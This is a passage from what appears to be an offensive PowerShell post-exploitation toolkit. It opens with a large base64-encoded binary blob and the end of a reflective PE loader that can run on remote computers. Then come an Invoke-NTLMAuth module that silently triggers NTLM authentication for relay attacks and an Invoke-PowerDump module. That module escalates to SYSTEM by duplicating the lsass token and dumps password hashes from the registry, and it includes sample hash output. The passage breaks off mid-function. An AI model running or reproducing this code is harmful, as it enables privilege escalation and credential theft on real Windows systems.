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yVDJcMmQybDJ0MnwyhDKMMpQynDKkMqwytDK8MsQyzDLUMtwy5DLsMvQy/DIEMwwzFDMcMyQzLDM0MzwzRDNMM1QzXDNkM2wzdDN8M4QzjDOUM5wzpDOsM7QzvDPEM8wz1DPcM+Qz7DP0M/wzBDQMNBQ0HDQkNCw0NDQ8NEQ0TDRUNFw0ZDRsNHQ0fDSENIw0lDScNKQ0rDS0NLw0xDTMNNQ03DTkNOw09DT8NAQ1DDUUNRw1JDUsNTQ1PDVENUw1VDVcNWQ1bDV0NXw1hDWMNZQ1nDWkNaw1tDW8NcQ1zDXUNdw15DXsNfQ1/DUENgw2FDYcNiQ2LDY0Njw2RDZMNlQ2XDZkNmw2dDZ8NoQ2jDaUNpw2pDasNrQ2vDbENsw21DbcNuQ27Db0Nvw2BDcMNxQ3HDckNyg3MDc4N0A3SDdQN1g3YDdoN3A3eDeAN4g3kDeYN6A3qDewN7g3wDfIN9A32DfgN+g38Df4NwA4CDgQOBg4IDgoODA4ODhAOEg4UDhYOGA4aDhwOHg4gDiIOJA4mDigOKg4sDi4OMA4yDjQONg44DjoOPA4+DgAOQg5EDkYOSA5KDkwOTg5QDlIOVA5WDlgOWg5cDl4OYA5iDmQOZg5oDmoObA5uDnAOcg50DnYOeA56DnwOfg5ADoIOhA6GDogOig6MDo4OkA6SDpQOlg6YDpoOnA6eDqAOog6kDqYOqA6qDqwOrg6wDrIOtA62DrgOug68Dr4OgA7CDsQOxg7IDsoOzA7ODtAO0g7UDtYO2A7aDtwO3g7gDuIO5A7mDugO6g7sDu4O8A7yDvQO9g74DvoO/A7+DsAPAg8EDwYPCA8KDwwPDg8QDxIPFA8WDxgPGg8cDx4PIA8iDyQPJg8oDyoPLA8uDzAPMg80DzYPOA86DzwPPg8AD0IPRA9GD0gPSg9MD04PUA9SD1QPVg9YD1oPXA9eD2APYg9kD2YPaA9qD2wPbg9wD3IPdA92D3gPeg98D34PQA+CD4QPhg+ID4oPjA+OD5APgCQAwCQAQAA/DBYOmQ6cDp8Oog6lDqYOpw6oDqkOqg6rDqwOrQ6uDq8OsA60DrUOtg63DrgOuQ66DrsOvA69Dr4Ovw6ADsEOwg7DDsQOxQ7GDscOyA7JDsoOyw7MDs4O0A7SDtQO1g7YDtoO3A7eDuAO4g7kDuYO6A7qDuwO7g7wDvIO9A72DvgO+g78Dv4OwA8CDwQPBg8IDwoPDA8ODxAPEg8UDxYPGA8aDxwPHg8gDyIPJA8mDygPKg8sDy4PMA8yDzQPNg84DzoPPA8+DwAPQg9ED0YPSA9KD0wPTg9QD1IPVA9WD1gPWg9cD14PYA9iD2QPZg9oD2oPbA9uD3APcg90D3YPeA96D3wPfg9AD4IPhA+GD4gPig+MD44PkA+SD5QPlg+YD5oPnA+eD6APog+kD6YPqA+qD6wPrg+wD7IPtA+2D7gPug+8D74PgA/CD8QPxg/ID8oPzA/OD9AP0g/UD9YP2A/aD9wP3g/gD+IP5A/mD+gP6g/sD+4P8A/yD/QP9g/4D/oP/A/+D8AoAMAtAAAAAAwCDAQMBgwIDAoMEAwRDBIMEwwUDBUMFgwXDBgMGQwaDBsMHAwdDB4MHwwhDCMMJAwlDCYMJwwoDCkMKgwrDC0MLgwvDDUMNgw3DDgMOQw6DDsMPAw9DD4MAQxCDEMMVQxWDFcMWAxZDFoMWwxcDF0MXgxfDGAMYQxiDGMMZQ5mDmcOaA5pDmoObQ5uDm8OcA5xDnIOcw54DkQOhQ6GDocOjA6pDqoOrQ6AAAAwAMAGAMAANg23DbgNuQ26DbsNvA29Db4Nvw2ADcENwg3DDcQNxQ3GDccNyA3JDcoNyw3MDc0Nzg3PDdAN0Q3SDdMN1A3VDdgN2Q3aDdsN3A3dDd4N3w3gDeEN4g3jDeQN5Q3mDecN6A3pDeoN6w3sDe0N7g3vDfAN8Q3yDfMN9A31DfYN9w34DfkN+g37DfwN/Q3+Df8NwA4BDgIOAw4EDgYOCA4JDgoOCw4MDg0ODg4PDhAOEQ4SDhMOFA4VDhYOFw4kDiUOJg4nDjkOOg49DgAOQQ5CDkMORA5FDkYORw5IDkkOSg5LDkwOTQ5ODk8OUA5RDlIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDmQOZg5nDmgOag5rDm4Obw5yDnMOdg53DngOeg57DnwOfg5/DkAOgg6DDoYOhw6KDosOjg6PDpIOkw6WDpcOmg6bDp4Onw6iDqMOpg6nDqgOqg6rDqwOrg6vDrAOsQ6yDrMOtA61DrYOtw64DrkOug67DrwOvQ6+Dr8OgA7CDsMOxQ7GDscOyA7JDsoOyw7MDs0Ozg7PDtAO0Q7SDtMO1A7VDtYO1w7YDtkO2g7bDtwO3Q7eDt8O4A7hDuIO4w7kDuUO5g7nDvgOxA8FDwYPBw8QDx0PHg8fDyAPIQ8iDyQPJQ8mDycPKA8ED0UPRg9YD1kPXA9fD2APYQ9iD2MPZA9lD2YPZw9oD2kPag9rD2wPbQ9uD28PcA9yD3MPdQ92D3gPeQ98D38PQA+BD4IPgw+ED4UPhg+HD4gPiQ+MD48PkA+TD5YPlw+YD5kPmg+bD5wPnQ+eD58PoA+hD6IPow+kD6UPpg+nD6gPqQ+qD6sPrA+tD64Prw+wD7EPsg+1D7gPuQ+6D7sPvA+9D74Pvw+AD8EPwg/DD8QPxQ/GD8cPyA/JD8oPyw/MD80Pzg/PD9EP1A/VD9YP1w/YD9kP2g/bD9wP3Q/eD98P4A/hD+IP4w/kD+UP5g/nD+gP6Q/qD+sP7A/tD+4P7w/wD/EP8g/zD/QP9Q/2D/cP+A/5D/oP+w/8D/0P/g//D8A0AMAfAEAAAAwBDAIMAwwEDAUMBgwHDAgMCQwKDAsMDgwRDBIMEwwUDBUMFgwXDBgMGQwaDBsMHAwdDB4MIQwkDCUMJgwnDCgMKQwqDCsMLAwtDC4MLwwwDDEMMgwzDDQMNQw2DDcMOAw5DDoMOww8DD0MPgw/DAIMRQxGDEcMSAxJDEwMTQxODFQMWgxgDGYMZwxsDG0McgxzDHgMegx7DHwMfQx+DH8MQAyBDIQMjAyNDI4MlwyYDJkMmwycDJ0MngyfDKAMoQyiDKMMpAylDKYMpwyoDKkMqgyrDKwMrQyuDK8MsAyxDLIMswy0DLUMtgy3DLgMuQy6DLsMvAy9DL4MvwyADMEMwgzDDMQMxQzGDMcMyAzJDMoMywzMDM0MzgzPDNAM0QzSDNMM1AzVDNYM1wzYDNkM2gzbDNwM3QzeDN8M4AzhDOIM4wzkDOUM5gznDOgM6QzqDOsM7AztDO4M7wz9DT4NEw1tDi4OLw4PDlAOUQ5SDlMOQCQBQBwAAAAbDmMOZA5nDmgOaw5sDm8OcA54DkAOiA6LDpIOmg6iDqoOsQ6yDroOgg7KDtIO1Q7cDt8O5g7uDvYO/g7GDw4PFg8ZDyAPKA8wDzcPOA8AD0cPSA9QD1gPYA9oD3APdw94D38PQA+AAAAwAUAGAEAAAAwCDCAMoQyJDgoOSw5MDk0OTg5PDlAOUQ5SDlMOVA5VDlYOVw5YDlkOWg5bDlwOXQ5eDl8OYA5hDmIOYw5kDmUOZg5nDmgOaQ5qDmsObA5tDm4Obw5wDnEOcg5zDnQOdw54DnkOeg57DnwOfQ5+Dn8OQA6BDoIOgw6EDoUOhg6HDogOiQ6KDosOjA6NDo4Ojw6QDpEOkg6TDpQOlQ6WDpcOmA6ZDpoOmw6cDp0Ong6fDqAOoQ6iDqMOrQ6xDrUOuQ69DoUOyA7JDsoOyw7TDvEPMg8zDzQPNQ82DzcPOA85DzoPPA8+Dz8PAA9BD0IPQw9ED0UPRg9HD0oPSw9MD00PTg9PD1APUQ9TD1QPQA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if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs) } else { Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs) -ComputerName $ComputerName } } $parts = $(whoami /user)[-1].split(" ")[1]; $parts2 = $parts.split('-'); $HostName = $([System.Net.Dns]::GetHostByName(($env:computerName)).HostName); $DomainSID = $parts2[0..($parts2.Count-2)] -join '-'; $results = Main; "Hostname: $HostName / $DomainSID"; $results } ================================================ FILE: modules/Invoke-NTLMAuth.ps1 ================================================ function Invoke-NTLMAuth { <# .SYNOPSIS Triggers Internet Explorer to send NTLM authentication to a specified URL. Function: Invoke-NTLMAuth Author: Arno0x0x, Twitter: @Arno0x0x .DESCRIPTION If Internet Explorer is configured to automatically authenticate against some URL (typically internal domain URL), the Windows SSO mechanism will have an NTLM authentication initiated with the host. This can typically be used in a ntlm-auth-relay attack with tools such as Inveigh, Snarf, etc. .EXAMPLE PS C:\> Invoke-NTLMAuth http://10.0.0.2/ #> [CmdletBinding()] Param ( [Parameter(Mandatory = $True, Position = 0)] [ValidateNotNullOrEmpty()] [String] $URL = "" ) try { #Create hidden IE Com Object $IEComObject = New-Object -com "InternetExplorer.Application" $IEComObject.visible = $False $IEComObject.navigate($URL) Start-Sleep -s 5 $IEComObject.Quit() } catch {} } ================================================ FILE: modules/Invoke-PowerDump.ps1 ================================================ # Pulled from darkoperator's Posh-SecMod: # https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 function Invoke-PowerDump { <# .SYNOPSIS Dumps hashes from the local system. Note: administrative privileges required. .DESCRIPTION Generate a command for dumping hashes from a Windows System PowerShell.exe -command Command must be executed as SYSTEM if ran as administrator it will privilage escalate to SYSTEM and execute a hashdump by reading the hashes from the registry. .EXAMPLE $enc = Get-PostHashdumpScript C:\PS>powershell.exe -command $enc Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d4afe1d16ae931b74c59d7e1c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Carlos:1001:aad3b435b51404eeaad3b435b51404ee:62096e5ed83a10cf61cf79cc36738519::: HomeGroupUser$:1003:aad3b435b51404eeaad3b435b51404ee:951b271a4b7d1dd7a25e3d9c9f87341e::: Executes the compressed command generated by the function and dumps the windows hashes from the registry. .NOTES PowerDump script by Kathy Peters, Josh Kelley (winfang) and Dave Kennedy (ReL1K) Privilage Escalation from http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/05/use-powershell-to-duplicate-process-tokens-via-p-invoke.aspx #> $sign = @" using System; using System.Runtime.InteropServices; public static class priv { [DllImport("shell32.dll")] public static extern bool IsUserAnAdmin(); } "@ $adminasembly = Add-Type -TypeDefinition $sign -Language CSharp -PassThru function ElevatePrivs { $signature = @" [StructLayout(LayoutKind.Sequential, Pack = 1)] public struct TokPriv1Luid { public int Count; public long Luid; public int Attr; } public const int SE_PRIVILEGE_ENABLED = 0x00000002; public const int TOKEN_QUERY = 0x00000008; public const int TOKEN_ADJUST_PRIVILEGES = 0x00000020; public const UInt32 STANDARD_RIGHTS_REQUIRED = 0x000F0000; public const UInt32 STANDARD_RIGHTS_READ = 0x00020000; public const UInt32 TOKEN_ASSIGN_PRIMARY = 0x0001; public const UInt32 TOKEN_DUPLICATE = 0x0002; public const UInt32 TOKEN_IMPERSONATE = 0x0004; public const UInt32 TOKEN_QUERY_SOURCE = 0x0010; public const UInt32 TOKEN_ADJUST_GROUPS = 0x0040; public const UInt32 TOKEN_ADJUST_DEFAULT = 0x0080; public const UInt32 TOKEN_ADJUST_SESSIONID = 0x0100; public const UInt32 TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY); public const UInt32 TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID); public const string SE_TIME_ZONE_NAMETEXT = "SeTimeZonePrivilege"; public const int ANYSIZE_ARRAY = 1; [StructLayout(LayoutKind.Sequential)] public struct LUID { public UInt32 LowPart; public UInt32 HighPart; } [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { public LUID Luid; public UInt32 Attributes; } public struct TOKEN_PRIVILEGES { public UInt32 PrivilegeCount; [MarshalAs(UnmanagedType.ByValArray, SizeConst=ANYSIZE_ARRAY)] public LUID_AND_ATTRIBUTES [] Privileges; } [DllImport("advapi32.dll", SetLastError=true)] public extern static bool DuplicateToken(IntPtr ExistingTokenHandle, int SECURITY_IMPERSONATION_LEVEL, out IntPtr DuplicateTokenHandle); [DllImport("advapi32.dll", SetLastError=true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool SetThreadToken( IntPtr PHThread, IntPtr Token ); [DllImport("advapi32.dll", SetLastError=true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle); [DllImport("advapi32.dll", SetLastError = true)] public static extern bool LookupPrivilegeValue(string host, string name, ref long pluid); [DllImport("kernel32.dll", ExactSpelling = true)] public static extern IntPtr GetCurrentProcess(); [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall, ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen); "@ $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent()) if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) { Write-Warning "Run the Command as an Administrator" Break } Add-Type -MemberDefinition $signature -Name AdjPriv -Namespace AdjPriv $adjPriv = [AdjPriv.AdjPriv] [long]$luid = 0 $tokPriv1Luid = New-Object AdjPriv.AdjPriv+TokPriv1Luid $tokPriv1Luid.Count = 1 $tokPriv1Luid.Luid = $luid $tokPriv1Luid.Attr = [AdjPriv.AdjPriv]::SE_PRIVILEGE_ENABLED $retVal = $adjPriv::LookupPrivilegeValue($null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid) [IntPtr]$htoken = [IntPtr]::Zero $retVal = $adjPriv::OpenProcessToken($adjPriv::GetCurrentProcess(), [AdjPriv.AdjPriv]::TOKEN_ALL_ACCESS, [ref]$htoken) $tokenPrivileges = New-Object AdjPriv.AdjPriv+TOKEN_PRIVILEGES $retVal = $adjPriv::AdjustTokenPrivileges($htoken, $false, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero) if(-not($retVal)) { [System.Runtime.InteropServices.marshal]::GetLastWin32Error() Break } $process = (Get-Process -Name lsass) #$process.name [IntPtr]$hlsasstoken = [IntPtr]::Zero $retVal = $adjPriv::OpenProcessToken($process.Handle, ([AdjPriv.AdjPriv]::TOKEN_IMPERSONATE -BOR [AdjPriv.AdjPriv]::TOKEN_DUPLICATE), [ref]$hlsasstoken) [IntPtr]$dulicateTokenHandle = [IntPtr]::Zero $retVal = $adjPriv::DuplicateToken($hlsasstoken, 2, [ref]$dulicateTokenHandle) $retval = $adjPriv::SetThreadToken([IntPtr]::Zero, $dulicateTokenHandle) if(-not($retVal)) { [System.Runtime.InteropServices.marshal]::GetLastWin32Error() } } function LoadApi { $oldErrorAction = $global:ErrorActionPreference; $global:ErrorActionPreference = "SilentlyContinue"; $test = [PowerDump.Native]; $global:ErrorActionPreference = $oldErrorAction; if ($test) { # already loaded return; } $code = @" using System; using System.Security.Cryptography; using System.Runtime.InteropServices; using System.Text; namespace PowerDump { public class Native { [DllImport("advapi32.dll", CharSet = CharSet.Auto)] public static extern int RegOpenKeyEx( int hKey, string subKey, int ulOptions, int samDesired, out int hkResult); [DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")] extern public static int RegEnumKeyEx( int hkey, int index, StringBuilder lpName, ref int lpcbName, int reserved, StringBuilder lpClass, ref int lpcbClass, out long lpftLastWriteTime); [DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)] extern public static int RegQueryInfoKey( int hkey, StringBuilder lpClass, ref int lpcbClass, int lpReserved, out int lpcSubKeys, out int lpcbMaxSubKeyLen, out int lpcbMaxClassLen, out int lpcValues, out int lpcbMaxValueNameLen, out int lpcbMaxValueLen, out int lpcbSecurityDescriptor, IntPtr lpftLastWriteTime); [DllImport("advapi32.dll", SetLastError=true)] public static extern int RegCloseKey( int hKey); } } // end namespace PowerDump public class Shift { public static int Right(int x, int count) { return x >> count; } public static uint Right(uint x, int count) { return x >> count; } public static long Right(long x, int count) { return x >> count; } public static ulong Right(ulong x, int count) { return x >> count; } public static int Left(int x, int count) { return x << count; } public static uint Left(uint x, int count) { return x << count; } public static long Left(long x, int count) { return x << count; } public static ulong Left(ulong x, int count) { return x << count; } } "@ $provider = New-Object Microsoft.CSharp.CSharpCodeProvider $dllName = [PsObject].Assembly.Location $compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters $assemblies = @("System.dll", $dllName) $compilerParameters.ReferencedAssemblies.AddRange($assemblies) $compilerParameters.GenerateInMemory = $true $compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code) if($compilerResults.Errors.Count -gt 0) { $compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) } } } $antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0"); $almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0"); $empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee); $empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0); $odd_parity = @( 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14, 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31, 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47, 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62, 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79, 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94, 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110, 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127, 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143, 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158, 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174, 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191, 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206, 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223, 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239, 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254 ); function sid_to_key($sid) { $s1 = @(); $s1 += [char]($sid -band 0xFF); $s1 += [char]([Shift]::Right($sid,8) -band 0xFF); $s1 += [char]([Shift]::Right($sid,16) -band 0xFF); $s1 += [char]([Shift]::Right($sid,24) -band 0xFF); $s1 += $s1[0]; $s1 += $s1[1]; $s1 += $s1[2]; $s2 = @(); $s2 += $s1[3]; $s2 += $s1[0]; $s2 += $s1[1]; $s2 += $s1[2]; $s2 += $s2[0]; $s2 += $s2[1]; $s2 += $s2[2]; return ,((str_to_key $s1),(str_to_key $s2)); } function str_to_key($s) { $key = @(); $key += [Shift]::Right([int]($s[0]), 1 ); $key += [Shift]::Left( $([int]($s[0]) -band 0x01), 6) -bor [Shift]::Right([int]($s[1]),2); $key += [Shift]::Left( $([int]($s[1]) -band 0x03), 5) -bor [Shift]::Right([int]($s[2]),3); $key += [Shift]::Left( $([int]($s[2]) -band 0x07), 4) -bor [Shift]::Right([int]($s[3]),4); $key += [Shift]::Left( $([int]($s[3]) -band 0x0F), 3) -bor [Shift]::Right([int]($s[4]),5); $key += [Shift]::Left( $([int]($s[4]) -band 0x1F), 2) -bor [Shift]::Right([int]($s[5]),6); $key += [Shift]::Left( $([int]($s[5]) -band 0x3F), 1) -bor [Shift]::Right([int]($s[6]),7); $key += $([int]($s[6]) -band 0x7F); 0..7 | %{ $key[$_] = [Shift]::Left($key[$_], 1); $key[$_] = $odd_parity[$key[$_]]; } return ,$key; } function NewRC4([byte[]]$key) { return new-object Object | Add-Member NoteProperty key $key -PassThru | Add-Member NoteProperty S $null -PassThru | Add-Member ScriptMethod init { if (-not $this.S) { [byte[]]$this.S = 0..255; 0..255 | % -begin{[long]$j=0;}{ $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length; $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp; } } } -PassThru | Add-Member ScriptMethod "encrypt" { $data = $args[0]; $this.init(); $outbuf = new-object byte[] $($data.Length); $S2 = $this.S[0..$this.S.Length]; 0..$($data.Length-1) | % -begin{$i=0;$j=0;} { $i = ($i+1) % $S2.Length; $j = ($j + $S2[$i]) % $S2.Length; $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp; $a = $data[$_]; $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ]; $outbuf[$_] = ($a -bxor $b); } return ,$outbuf; } -PassThru } function des_encrypt([byte[]]$data, [byte[]]$key) { return ,(des_transform $data $key $true) } function des_decrypt([byte[]]$data, [byte[]]$key) { return ,(des_transform $data $key $false) } function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt) { $des = new-object Security.Cryptography.DESCryptoServiceProvider; $des.Mode = [Security.Cryptography.CipherMode]::ECB; $des.Padding = [Security.Cryptography.PaddingMode]::None; $des.Key = $key; $des.IV = $key; $transform = $null; if ($doEncrypt) {$transform = $des.CreateEncryptor();} else{$transform = $des.CreateDecryptor();} $result = $transform.TransformFinalBlock($data, 0, $data.Length); return ,$result; } function Get-RegKeyClass([string]$key, [string]$subkey) { switch ($Key) { "HKCR" { $nKey = 0x80000000} #HK Classes Root "HKCU" { $nKey = 0x80000001} #HK Current User "HKLM" { $nKey = 0x80000002} #HK Local Machine "HKU" { $nKey = 0x80000003} #HK Users "HKCC" { $nKey = 0x80000005} #HK Current Config default { throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC" } } $KEYQUERYVALUE = 0x1; $KEYREAD = 0x19; $KEYALLACCESS = 0x3F; $result = ""; [int]$hkey=0 if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey)) { $classVal = New-Object Text.Stringbuilder 1024 [int]$len = 1024 if (-not 